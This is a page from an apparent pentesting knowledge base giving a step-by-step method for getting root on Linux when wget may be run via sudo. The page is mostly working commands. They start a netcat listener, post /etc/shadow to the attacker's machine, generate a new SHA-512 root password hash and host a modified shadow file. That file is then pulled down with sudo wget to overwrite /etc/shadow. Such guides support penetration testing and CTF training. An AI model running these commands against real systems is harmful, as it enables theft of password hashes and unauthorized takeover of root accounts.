Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Modify /etc/shadow

Sudo Wget Privilege Escalation

The "sudo wget" command may be vulnerable to privilege escalation (PrivEsc).

PreviousSudo Wall Privilege EscalationNextSudoedit Privilege Escalation

Last updated 1 year ago

sudo -l

(root) NOPASSWD: /usr/bin/wget
Copied!

If we can execute "wget" as root, we may be able to escalate privileges.

Get "/etc/shadow" and generate a new hash passwd, then set it to the shadow file, next upload it. That changes the root password.

To see the content of /etc/shadow, we can use netcat listener. So First, start a listener in local machine.

nc -lvnp 4444
Copied!

In target machine, display the contents of the "/etc/shadow" to the local machine using the following command.

sudo /usr/bin/wget --post-file=/etc/shadow <local-ip> 4444
Copied!

We should see the content in our local machine via netcat listener. Copy the content.

We create a new shadow file in local. The shadow file will be stored into the target /etc/shadow later.

vim shadow.txt
Copied!

In vim editor (or nano, vi, etc.), paste the content of /etc/shadow which we've copied in the previous section.

Generate a new hash password for a new root user in local machine.

# -6: SHA512
openssl passwd -6 -salt 'salt' 'password'
Copied!

Copy the generated password and paste it at the password of the root user into the "shadow.txt". As a result, the contents of the "shadow.txt" should look like this:

root:$6$salt$IxDD...DCy.g.:18195:0:99999:7:::
...
Copied!

To put the shadow.txt into the target machine, start web server for hosting this file.

python3 -m http.server 8000
Copied!

Download this file into the /etc/shadow in remote machine. To do that, we need to run it as root.

sudo /usr/bin/wget http://<local-ip>:8000/shadow.txt -O /etc/shadow 
Copied!

Finally, you can switch to the root user with the password we've created.

su root

Investigation
Modify /etc/shadow
1. Get the Content of /etc/shadow
2. Create a New Shadow File
3. Create a New Root User Password and Add to Shadow File
4. Transfer the Content of the Shadow File
Page cover image